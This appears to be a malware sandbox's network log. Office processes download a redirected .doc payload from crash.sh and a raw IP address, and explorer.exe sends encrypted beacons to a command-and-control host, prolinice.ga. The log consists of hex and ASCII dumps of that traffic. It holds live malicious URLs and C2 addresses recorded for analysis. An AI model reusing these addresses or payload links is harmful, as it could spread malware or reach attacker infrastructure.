                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031708002 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031719923 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031739950 CEST1000INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031750917 CEST1236INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                      Aug 31, 2024 15:51:22.031764984 CEST1236INData Raw: 73 6b 63 62 79 6a 54 57 6a 2f 31 32 5a 4e 6d 58 62 68 31 59 73 68 33 30 69 64 52 74 52 55 35 46 2b 69 54 49 56 30 39 6b 39 79 6c 78 5a 47 2f 6d 6c 77 59 48 74 63 57 43 62 31 53 4e 53 45 41 46 39 4b 5a 2f 47 38 74 45 6a 62 5a 5a 64 4d 62 6c 37 41
                                                      Data Ascii: skcbyjTWj/12ZNmXbh1Ysh30idRtRU5F+iTIV09k9ylxZG/mlwYHtcWCb1SNSEAF9KZ/G8tEjbZZdMbl7AWQdwSLj0BuVkpll8ZFsMyab06YrM4KiWQHwU2K25QJN0VLFG0SkHbJjNxWVN+UbCRZ3D02qZ108LzPpQZbLUCHlMBOt2lynKxVufSLRGxuTWNFfK1YlKywbvtIRcKVbsCgU0j5aVAPpNkjnFRTQslVjD1GB7lS1Ig
                                                      Aug 31, 2024 15:51:22.036585093 CEST1236INData Raw: 44 63 44 79 47 4f 68 45 6a 6e 76 6f 2b 50 2b 56 45 47 74 5a 77 64 31 73 6f 50 57 36 62 6b 57 38 53 4d 47 54 46 6a 44 4d 66 4e 46 56 43 4e 59 56 57 4f 77 33 47 65 2b 62 41 51 58 65 53 37 79 44 30 41 72 32 47 4f 2b 4c 43 37 36 6a 43 66 6e 4d 33 78
                                                      Data Ascii: DcDyGOhEjnvo+P+VEGtZwd1soPW6bkW8SMGTFjDMfNFVCNYVWOw3Ge+bAQXeS7yD0Ar2GO+LC76jCfnM3xy7TMQwjezhF8++kOi1i2ulrsn7jN46zEuv2bzTGmatYxQa2E6cJCHsklfQTU++nfReZD0kUP6o4FySiO0CYtuzwyFITKmwkNP4mVsIdgFlDFKtUOdEaR1VewlUlIxUjGDFNN2mj2lV1ajWSUaArtNVRtwxXPjiZqy


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      4192.168.2.2249173185.251.91.119801244C:\Windows\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:51:44.381592035 CEST276OUTPOST /index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://wrbvhkkkwfg.com/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 275
                                                      Host: prolinice.ga
                                                      Aug 31, 2024 15:51:44.381608963 CEST275OUTData Raw: 6e e2 97 fb c0 4d f4 65 6e 17 bf 60 4f 5e f9 8e d8 51 ec 5b 45 88 c9 9f f2 e1 7d 18 dc 4d 40 05 40 b1 ea b8 0a df 82 a5 67 be c4 f1 99 ac 30 26 e8 37 1e 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 fb bc 52 ee cc 59 3b 1f d6 b3 50 4c 85 65 c2 e2 ce
                                                      Data Ascii: nMen`O^Q[E}M@@g0&7H8.6hEvRY;PLel|&4]$^Y927LKi6=^I*jSom{"3y"pAyPM9|CKI+9sA.)q70lb;
                                                      Aug 31, 2024 15:51:45.412688971 CEST1236INHTTP/1.1 404 Not Found
                                                      date: Sat, 31 Aug 2024 13:51:45 GMT
                                                      server: Apache/2.4.59 (Debian)
                                                      transfer-encoding: chunked
                                                      content-type: text/html; charset=utf-8
                                                      Data Raw: 33 37 44 33 0d 0a 18 00 00 00 a0 5f e8 0a 27 e8 c8 da 8d 2a 7f ba 53 e4 29 1d ec 5d a3 3f 18 cd 8f ba 00 ca 2c 05 00 7c e1 f7 57 09 03 02 00 09 00 9e 03 00 00 53 1f 7d 22 77 32 62 71 76 3f 4f 55 52 12 42 00 c9 32 ee 68 fe 0f ca 76 74 07 d6 d6 f9 b8 92 29 e8 55 92 92 3e c8 50 dd 24 a4 99 ce 5c 90 b9 3b fc 51 49 c0 0d f0 19 d3 e9 92 2a 7a f7 09 00 bb 7a b8 01 84 b7 a3 64 8b 0b f3 9f 79 57 fa 26 ce 46 fb 76 8c c7 a7 e0 22 d1 2d c9 1e 43 c3 ef c1 4c dd a0 af 3d b8 a8 a5 fb c0 70 8e 98 0e df 4b cc 40 42 f2 70 5e a2 6b 51 b2 9f 66 73 fe c7 15 ac cd f6 9d 88 6a 44 07 1e 8d 8b 6b 24 18 2b 4b 2a ec 81 b7 50 50 a4 4e ad cf 32 5c c0 15 b4 57 90 1b 0d ee 6c f7 54 23 c9 ed 8e bc 36 a0 b4 7a c0 a1 84 b8 ba d4 a3 62 52 1c ae d9 4b 5a 18 a9 1c db 20 3a d0 44 3f 55 06 6b bf 4b 63 27 f1 ac 4f fe d1 04 8b 3f ba 91 69 f9 fb 81 fe 97 af cd a6 40 69 e9 33 b2 a6 45 cc f6 83 0e 7c 20 5b 7d 1d a4 53 32 fe 9d cc 54 71 e4 4c 20 4c b2 37 b3 8e 0f 1b d8 40 78 f3 c6 c7 84 1a aa 21 d4 fa 17 f2 46 ab 2a 9b db a1 fa 45 c5 f8 a8 f5 [TRUNCATED]
                                                      Data Ascii: 37D3_'*S)]?,|WS}"w2bqv?OURB2hvt)U>P$\;QI*zzdyW&Fv"-CL=pK@Bp^kQfsjDk$+K*PPN2\WlT#6zbRKZ :D?UkKc'O?i@i3E| [}S2TqL L7@x!F*Ex{4@h;pg_Q@[N2*H%s;"r21LVRvo9bN|P,ds,^L+j m.&>g!=/r:l_U*kH >(OAO|q;@+o%Snnq nU[f&C5GT] T]>g{v[ySzB8IX<\r}23:=;HX>H+exij=Ou`'p3|JY=R^Xo[#kn^T-la@9>$z|kXv6]O8Rp|otzAY2u-jk75HwbEIrBG`yDvWR0md9n/oc$7;KC?iT6cTD/m#R|~YrMM"jg/7L@+Y8#*P`bNG4oFZ2:JFxGcCl_\?+m6z3QU.yjlx`Z [TRUNCATED]
                                                      Aug 31, 2024 15:51:45.412708998 CEST1236INData Raw: f0 d3 5f c4 6b 30 c1 8f 61 0c bd 9f d9 57 2c d9 78 71 c3 ed 95 1c 57 62 73 a5 f6 ba 18 ea 07 01 95 65 ac 19 bf f4 04 76 fe 6d 42 8c 13 15 48 2c 63 3a fe 6c 25 54 4d 30 85 30 92 ad 37 23 ec 06 31 91 f0 16 ff a2 b3 e1 cd 3c d6 3f 9c 79 ef 0e 00 cb
                                                      Data Ascii: _k0aW,xqWbsevmBH,c:l%TM007#1<?ye-gtgcwmV`&$E^uAwI0q:<#yfHJy<4^/|gxgaD{t`viG"J+`RsqN:#(]5%f__`BxTCB/
                                                      Aug 31, 2024 15:51:45.412718058 CEST1236INData Raw: 22 64 c2 b3 8e d1 96 69 6f da d8 11 e6 1b d4 e5 7a 74 48 ec 08 2a e9 cd 0c 7b b5 58 b4 8f 13 bb 67 d8 d1 b9 1a 51 6c 46 fe e3 7d e4 1d 37 e6 75 5c 03 96 01 ae 43 a2 02 37 3a 0c bb 2c 23 f6 16 c7 34 0b 51 a1 b0 42 47 f6 c4 67 8a ab d3 20 36 0f b2
                                                      Data Ascii: "dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{
                                                      Aug 31, 2024 15:51:45.412729025 CEST672INData Raw: 2c 06 25 d8 06 da cf 30 f2 f7 8c 37 90 3f e2 de 0d 62 d2 0f 0f f4 7b 4b 6b 0e 27 42 d6 53 86 5c e6 6b 56 9a 09 1a b2 a6 c7 d2 23 76 42 63 9d f6 9b 07 14 29 a7 e1 78 c2 42 36 6a 58 0a 60 23 51 bf 62 27 01 e7 c5 7d 19 05 9d be 9b b5 07 54 be 5e 5e
                                                      Data Ascii: ,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#
                                                      Aug 31, 2024 15:51:45.412739038 CEST1236INData Raw: b8 16 44 62 0c af 09 64 da d6 0c f6 b7 c6 ee 3c 8c 4e 3b 7d 63 48 cd 9f a8 81 49 c4 f0 33 8d 7d cf 2c 5b cc e7 0f ca 1e e8 c4 e9 3e bc 71 a2 e1 e9 cb 5d d2 53 14 7a 32 14 da c0 5b c7 b9 9f 02 32 8d 22 eb df 96 ca e7 65 55 4c ac c3 cd 45 e4 f8 b8
                                                      Data Ascii: Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5Lyc5|WP%s$zGbi*Uk$K1>9lH*j]hf?(9ZH&TO!.^>2<RKz
                                                      Aug 31, 2024 15:51:45.412750006 CEST1236INData Raw: c6 13 f3 bc d2 ac 4b 10 a6 e7 01 de 43 2b 85 af 1d c9 3c 79 6d 6d bd 91 d0 a7 43 78 00 e7 95 1c 3e c4 b0 73 48 1e cb 95 ad 06 fa 0e d0 ce 58 e7 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b
                                                      Data Ascii: KC+<ymmCx>sHXomSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVp
                                                      Aug 31, 2024 15:51:45.412760019 CEST1236INData Raw: 03 89 76 6d 5d f9 fc 08 bd 71 1f 36 fa 40 a9 33 9a 5c c6 cd ac cc d2 e0 69 40 06 9e 0c f7 59 ac ff fc 9d 67 e2 b2 e0 e9 a8 9c bc 3e a7 ca e8 34 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd
                                                      Data Ascii: vm]q6@3\i@Yg>48|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScd
                                                      Aug 31, 2024 15:51:45.412770987 CEST672INData Raw: 09 22 53 4e 4d 1d 0f c0 f1 7d 38 db 7b ef 82 ba bc 88 de 65 15 ce 1d 94 a0 51 c8 16 fa 66 fa 6f 72 7f fc 7f 07 67 58 da 9d ed fa d3 f0 91 09 6a a6 96 79 ab d8 ea fc d0 6c 2a ce b7 f0 59 51 2b f2 52 dc c2 91 56 73 13 17 ac 6a 0c 48 df f3 c5 67 94
                                                      Data Ascii: "SNM}8{eQforgXjyl*YQ+RVsjHg0a)avPlild?6\|z!7bySpm*@|>5j<~M@Gl37Mai,EW8'xgKP+j<]Cqrh]AQh
                                                      Aug 31, 2024 15:51:45.412967920 CEST1236INData Raw: f1 78 8e 29 7a 06 23 09 86 8f 6a c2 fa ab 2d 64 86 eb 24 dc 68 a0 b2 a8 55 d6 a7 65 ec e6 e3 ee 07 d2 07 10 34 55 34 aa 47 ab 58 e7 20 28 37 95 40 a5 b4 ba b4 1e fa 32 24 a6 1a fd e6 2e 44 02 5e a1 44 65 e0 f2 ab fe cd 8c e9 74 69 7b fc b8 ff 6a
                                                      Data Ascii: x)z#j-d$hUe4U4GX (7@2$.D^Deti{j\p%M;*^ kn?'CxKO@|7P@RS?JUet+XC?,c@<g7ks_'_bh.6^`u7x*H_Ul
                                                      Aug 31, 2024 15:51:45.412980080 CEST1236INData Raw: 09 e2 cb 0f 81 57 6d 67 5e d0 d4 95 49 5a 1c 02 ba 6c 4a ae c0 1a 7c c0 94 9b 9d 2e fe 17 02 29 28 46 57 39 ec 7b b9 da 55 2c f5 4f 31 88 a6 cc c5 4e e8 6d 4f 7e 19 c8 60 3f 6d 35 16 c6 f0 e2 e0 05 00 f0 f7 c9 5b f5 eb 55 64 58 ae df 99 6c e3 c5
                                                      Data Ascii: Wmg^IZlJ|.)(FW9{U,O1NmO~`?m5[UdXlc,7^UEr<l]_4-hP)"504o:`3X<`9xa-dW%hJm#{YSFf-b]Q?D\rMc\k&dbs7MLc>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      5192.168.2.2249174185.251.91.119802852C:\Windows\SysWOW64\explorer.exe
                                                      TimestampBytes transferredDirectionData
                                                      Aug 31, 2024 15:51:49.478857994 CEST274OUTPOST /index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://prolinice.ga/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 1395
                                                      Host: prolinice.ga
                                                      Aug 31, 2024 15:51:49.478885889 CEST1395OUTData Raw: 6e e2 97 fb c0 4d f4 65 6e 17 bf 60 4f 5e f9 8e d8 51 ec 5b 45 88 c9 9f f2 e1 7d 18 dc 4d 40 05 40 b1 ea b8 0a df 82 a5 67 be c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                                      Data Ascii: nMen`O^Q[E}M@@geug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~TF&u#RCIP6=I.:ua)i1b|Fz1~_"
                                                      Aug 31, 2024 15:51:50.536051035 CEST565INHTTP/1.1 404 Not Found
                                                      date: Sat, 31 Aug 2024 13:51:50 GMT
                                                      server: Apache/2.4.59 (Debian)
                                                      content-length: 409
                                                      content-type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.2249161208.64.171.2304433416C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:50:57 UTC321OUTGET /udMVqm HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: crash.sh
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:50:58 UTC563INHTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:50:58 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept
                                                      2024-08-31 13:50:58 UTC200INData Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 34 2e 31 34 38 2e 31 36 2f 39 30 2f 67 6e 2f 69 6e 65 74 6d 65 63 61 6e 67 65 74 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 68 69 6e 67 73 74 6f 62 65 66 69 6e 65 77 69 74 68 6d 65 73 68 65 69 73 6e 69 63 65 67 69 72 6c 77 68 6f 6c 6f 76 65 74 6f 64 72 69 76 65 74 68 65 6d 61 67 69 63 6f 66 6e 69 63 65 70 65 72 73 6f 6e 77 69 74 68 6d 65 67 72 65 61 74 74 68 69 6e 67 73 68 61 70 70 65 6e 69 6e 67 77 69 74 68 5f 5f 5f 5f 5f 5f 5f 5f 5f 67 6f 6f 64 67 69 72 6c 67 72 65 61 74 64 61 79 2e 64 6f 63
                                                      Data Ascii: Found. Redirecting to http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.2249163208.64.171.2304433692C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:50:59 UTC130OUTOPTIONS / HTTP/1.1
                                                      User-Agent: Microsoft Office Protocol Discovery
                                                      Host: crash.sh
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:51:00 UTC423INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:50:59 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 8
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Allow: GET,HEAD
                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                      2024-08-31 13:51:00 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                      Data Ascii: GET,HEAD


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      2192.168.2.2249164208.64.171.2304433692C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:01 UTC115OUTHEAD /udMVqm HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: crash.sh
                                                      2024-08-31 13:51:01 UTC575INHTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:01 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      3192.168.2.2249165208.64.171.230443
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:07 UTC125OUTOPTIONS / HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                      translate: f
                                                      Host: crash.sh
                                                      2024-08-31 13:51:10 UTC423INHTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:08 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 8
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Allow: GET,HEAD
                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                      2024-08-31 13:51:10 UTC8INData Raw: 47 45 54 2c 48 45 41 44
                                                      Data Ascii: GET,HEAD


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      4192.168.2.2249166208.64.171.230443
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:11 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 72 61 73 68 2e 73 68 0d 0a 0d 0a
                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: crash.sh
                                                      2024-08-31 13:51:11 UTC419INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:11 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 144
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Content-Security-Policy: default-src 'none'
                                                      2024-08-31 13:51:11 UTC144INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      5192.168.2.2249167208.64.171.230443
                                                      TimestampBytes transferredDirectionData
                                                      2024-08-31 13:51:11 UTC155OUTData Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 72 61 73 68 2e 73 68 0d 0a 0d 0a
                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: crash.sh
                                                      2024-08-31 13:51:12 UTC419INHTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:12 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 144
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
